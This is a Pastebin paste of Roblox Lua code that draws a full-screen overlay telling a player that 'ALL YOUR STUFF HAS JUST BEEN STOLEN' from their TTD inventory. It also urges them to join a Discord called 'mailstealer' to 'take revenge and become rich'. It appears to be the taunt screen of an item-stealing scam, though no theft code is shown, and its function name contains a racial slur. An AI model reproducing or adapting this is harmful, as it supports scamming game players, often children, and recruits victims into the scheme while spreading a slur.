Egorikusa

Untitled

Jun 4th, 2024
164
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.64 KB | None | 0 0
  1.  
  2. local function GetScammedNigga()
  3. local instance = {instances = {}}
  4. function instance.new(class, properties)
  5. local inst = Instance.new(class)
  6. for property, value in next, properties do
  7. inst[property] = value
  8. end
  9.  
  10. table.insert(instance.instances, inst)
  11. return inst
  12. end
  13. local ScreenGui =
  14. instance.new(
  15. "ScreenGui",
  16. {
  17. Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui"),
  18. ZIndexBehavior = Enum.ZIndexBehavior.Sibling,
  19. DisplayOrder = 60000000000001
  20. }
  21. )
  22.  
  23. local scammedez =
  24. instance.new(
  25. "Frame",
  26. {
  27. Name = "scammed ez",
  28. Parent = ScreenGui,
  29. BackgroundColor3 = Color3.fromRGB(40, 40, 40),
  30. BorderColor3 = Color3.fromRGB(0, 0, 0),
  31. BorderSizePixel = 0,
  32. Position = UDim2.new(0, 0, 1.1365951e-07, 0),
  33. Size = UDim2.new(1, 0, 1, 5)
  34. }
  35. )
  36.  
  37. local TextLabel =
  38. instance.new(
  39. "TextLabel",
  40. {
  41. Parent = scammedez,
  42. BackgroundColor3 = Color3.fromRGB(40, 40, 40),
  43. BorderColor3 = Color3.fromRGB(0, 0, 0),
  44. BorderSizePixel = 0,
  45. Position = UDim2.new(0.248348162, 0, 0.0528541245, 0),
  46. Size = UDim2.new(0.502200425, 0, 0.121825397, 0),
  47. Font = Enum.Font.FredokaOne,
  48. Text = "ALL YOUR STUFF HAS JUST BEEN STOLEN",
  49. TextColor3 = Color3.fromRGB(0, 255, 42),
  50. TextScaled = true,
  51. TextSize = 14.000,
  52. TextWrapped = true
  53. }
  54. )
  55.  
  56. local TextLabel =
  57. instance.new(
  58. "TextLabel",
  59. {
  60. Parent = scammedez,
  61. BackgroundColor3 = Color3.fromRGB(40, 40, 40),
  62. BorderColor3 = Color3.fromRGB(0, 0, 0),
  63. BorderSizePixel = 0,
  64. Position = UDim2.new(0.123158529, 0, 0.209235922, 0),
  65. Size = UDim2.new(0.751820982, 0, 0.123234972, 0),
  66. Font = Enum.Font.FredokaOne,
  67. Text = "We stole everything u had in ttd",
  68. TextColor3 = Color3.fromRGB(255, 0, 4),
  69. TextScaled = true,
  70. TextSize = 14.000,
  71. TextWrapped = true
  72. }
  73. )
  74.  
  75. local TextLabel =
  76. instance.new(
  77. "TextLabel",
  78. {
  79. Parent = scammedez,
  80. BackgroundColor3 = Color3.fromRGB(40, 40, 40),
  81. BorderColor3 = Color3.fromRGB(0, 0, 0),
  82. BorderSizePixel = 0,
  83. Position = UDim2.new(0.101914264, 0, 0.349384248, 0),
  84. Size = UDim2.new(0.795068204, 0, 0.0726670548, 0),
  85. Font = Enum.Font.FredokaOne,
  86. Text = "U probably want to get ur stuff back",
  87. TextColor3 = Color3.fromRGB(255, 142, 49),
  88. TextScaled = true,
  89. TextSize = 14.000,
  90. TextWrapped = true
  91. }
  92. )
  93.  
  94. local TextLabel =
  95. instance.new(
  96. "TextLabel",
  97. {
  98. Parent = scammedez,
  99. BackgroundColor3 = Color3.fromRGB(40, 40, 40),
  100. BorderColor3 = Color3.fromRGB(0, 0, 0),
  101. BorderSizePixel = 0,
  102. Position = UDim2.new(0.197513744, 0, 0.733943939, 0),
  103. Size = UDim2.new(0.654704094, 0, 0.168317646, 0),
  104. Font = Enum.Font.FredokaOne,
  105. Text = "If u want to take revenge and become rich join our discord .gg/mailstealer",
  106. TextColor3 = Color3.fromRGB(182, 123, 255),
  107. TextScaled = true,
  108. TextSize = 14.000,
  109. TextWrapped = true
  110. }
  111. )
  112. end
  113. GetScammedNigga()
Advertisement
Add Comment
Please, Sign In to add comment